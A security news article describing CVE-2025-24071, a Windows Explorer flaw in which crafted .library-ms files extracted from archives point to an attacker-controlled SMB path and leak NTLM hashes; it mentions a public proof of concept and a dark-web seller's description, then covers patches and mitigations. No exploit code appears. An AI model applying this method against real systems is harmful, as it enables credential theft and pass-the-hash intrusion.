A critical vulnerability in Microsoft Windows File Explorer, known as CVE-2025-24071, has been identified as a significant threat, enabling attackers to covertly capture NTLM hashed passwords without any user interaction. This flaw, dubbed the "NTLM Hash Leak via RAR/ZIP Extraction," remains especially concerning as it exploits the automatic file processing features inherent in the Windows operating system.
Discovered and publicly reported in mid-March 2025, the vulnerability exploits a mechanism where Windows Explorer automatically processes specially crafted .library-ms files extracted from compressed archives like RAR or ZIP. Security researchers explained how, when extracted, these XML-based files—trusted by Windows to define library locations—contain tags that point to attacker-controlled SMB servers (e.g., \192.168.1.116\shared). Upon extraction from the archive, Windows attempts to resolve the SMB path, which leads to an automatic NTLM authentication handshake that leaks sensitive credentials without the victim's knowledge.
Security researcher known as ‘0x6rss’ went public with a proof-of-concept exploit on GitHub just days after the discovery, showcasing how such attacks can be orchestrated. The PoC consists of a simple Python script that facilitates the generation of the malicious .library-ms file. Users can execute the script easily by running the command python poc.py, thus reducing the complexity for potential attackers.
The implications of this vulnerability are profound. Attackers can leverage the harvested hash in several ways, including pass-the-hash attacks that compromise network security, as well as offline NTLM hash cracking. The severity of the flaw has led to a CVSS score of 7.5, categorizing it as a significant risk that demands immediate attention.
Furthermore, the exploit's potential has been underscored by a threat actor, known as “Krypt0n,” who has reportedly offered the exploit for sale on dark web forums. “The server where the hashes are sent is created locally, for example, on a VPS,” Krypt0n was quoted discussing within online discussions. “Then, using an exploit, you generate a config with your IP, share, etc. […] If the user simply opens Explorer or accesses the shared folder, an automatic redirect occurs, and the user’s hash is sent to your server.”
In light of this vulnerability, Microsoft swiftly responded by releasing a critical patch during its scheduled March 2025 Patch Tuesday updates on the 11th. Windows users are strongly advised to apply these updates immediately to mitigate the risk of exploitation. Microsoft has been actively encouraging its user base to stay current with updates to fend off such vulnerabilities, especially as this not only highlights the precarious nature of NTLM authentication but also its susceptibility to exploitation.
The scope of this vulnerability affects various versions of Windows, including Windows 10 (versions 1607, 1809, 21H2, 22H2, 23H2, and 24H2), Windows 11 (24H2 and 23H2), as well as multiple iterations of Windows Server, further emphasizing the broad impact on users across Microsoft’s ecosystem.
Research indicates that the vulnerability has already been exploited in the wild, with caution suggested for users handling sensitive credentials and utilizing NTLM. Experts recommend that users not only ensure their systems are running the latest security patches but also consider disabling NTLM where feasible and implementing additional security measures, such as SMB signing, to further bolster defense against such attacks.
As technology continues to evolve, so do the tactics used by malicious actors. The discovery and exploitation of CVE-2025-24071 serve as a stark reminder of the relentless challenges that users face in securing their systems against sophisticated threats. By ensuring that systems are updated and understanding the mechanics of potential vulnerabilities like this, users can better protect themselves from falling victim to cyberattacks that exploit fundamental flaws in systems they rely on daily.
